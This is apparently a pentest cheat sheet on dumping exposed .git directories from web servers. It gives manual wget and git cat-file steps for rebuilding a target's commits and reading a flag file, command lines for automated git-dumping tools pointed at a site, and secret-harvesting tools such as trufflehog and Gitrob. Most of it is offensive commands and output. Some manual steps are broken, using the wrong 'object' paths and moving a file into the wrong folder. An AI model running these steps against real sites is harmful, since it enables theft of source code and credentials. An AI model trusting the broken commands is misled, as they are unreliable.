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# Git
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## Summary
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* [Example](#example)
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* [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
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* [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
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* [Tools](#tools)
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* [Automatic recovery](#automatic-recovery)
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* [git-dumper.py](#git-dumperpy)
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* [diggit.py](#diggitpy)
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* [GoGitDumper](#gogitdumper)
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* [rip-git](#rip-git)
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* [GitHack](#githack)
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* [GitTools](#gittools)
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* [Harvesting secrets](#harvesting-secrets)
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* [trufflehog](#trufflehog)
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* [Yar](#yar)
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* [Gitrob](#gitrob)
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* [Gitleaks](#gitleaks)
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* [Refererences]
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## Example
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The following examples will create either a copy of the .git or a copy of the current commit.
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Check for the following files, if they exist you can extract the .git folder.
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- .git/config
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- .git/HEAD
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- .git/logs/HEAD
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### Recovering file contents from .git/logs/HEAD
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1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
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2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
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```powershell
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0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
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15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
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26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
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6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
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```
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3. Access the commit using the hash
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```powershell
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# create an empty .git repository
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git init test
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cd test/.git
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# download the file
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wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
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# first byte for subdirectory, remaining bytes for filename
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mkdir .git/object/26
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mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
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# display the file
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git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
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tree 323240a3983045cdc0dec2e88c1358e7998f2e39
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parent 15ca375e54f056a576905b41a417b413c57df6eb
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author Michael <michael@easyctf.com> 1489390329 +0000
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committer Michael <michael@easyctf.com> 1489390329 +0000
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Initial.
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```
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4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
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```powershell
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wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
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mkdir .git/object/32
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mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
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git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
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040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
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100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
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040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
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100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
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040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
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```
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5. Read the data (flag.txt)
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```powershell
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wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
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mkdir .git/object/cb
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mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
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git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
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```
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### Recovering file contents from .git/index
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Use the git index file parser https://pypi.python.org/pypi/gin (python3).
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```powershell
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pip3 install gin
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gin ~/git-repo/.git/index
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```
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Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
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```powershell
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$ gin .git/index | egrep -e "name|sha1"
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name = AWS Amazon Bucket S3/README.md
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sha1 = 862a3e58d138d6809405aa062249487bee074b98
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name = CRLF injection/README.md
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sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
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```
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## Tools
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### Automatic recovery
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#### git-dumper.py
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```powershell
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git clone https://github.com/arthaud/git-dumper
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pip install -r requirements.txt
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./git-dumper.py http://web.site/.git ~/website
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```
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#### diggit.py
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```powershell
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git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
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./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
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./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
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-u is remote path, where .git folder exists
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-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
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-o is a hash of particular Git object to download
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```
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#### GoGitDumper
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```powershell
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go get github.com/c-sto/gogitdumper
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gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
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git log
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git checkout
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```
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#### rip-git
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```powershell
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git clone https://github.com/kost/dvcs-ripper
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perl rip-git.pl -v -u "http://web.site/.git/"
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git cat-file -p 07603070376d63d911f608120eb4b5489b507692
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tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
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parent 15ca375e54f056a576905b41a417b413c57df6eb
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author Michael <michael@easyctf.com> 1489389105 +0000
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committer Michael <michael@easyctf.com> 1489389105 +0000
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git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
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```
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#### GitHack
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```powershell
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git clone https://github.com/lijiejie/GitHack
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GitHack.py http://web.site/.git/
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```
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#### GitTools
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```powershell
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git clone https://github.com/internetwache/GitTools
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./gitdumper.sh http://target.tld/.git/ /tmp/destdir
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git checkout -- .
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```
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### Harvesting secrets
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#### trufflehog
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> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
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```powershell
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pip install truffleHog # https://github.com/dxa4481/truffleHog
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truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
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```
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#### Yar
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> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
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```powershell
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go get github.com/nielsing/yar # https://github.com/nielsing/yar
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yar -o orgname --both
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```
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#### Gitrob
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> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
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```powershell
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go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
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export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
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gitrob [options] target [target2] ... [targetN]
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```
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#### Gitleaks
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> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
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```powershell
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# Run gitleaks against a public repository
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docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
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# Run gitleaks against a local repository already cloned into /tmp/
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docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
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# Run gitleaks against a specific Github Pull request
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docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
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or
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go get -u github.com/zricethezav/gitleaks
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```
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## References
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- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)
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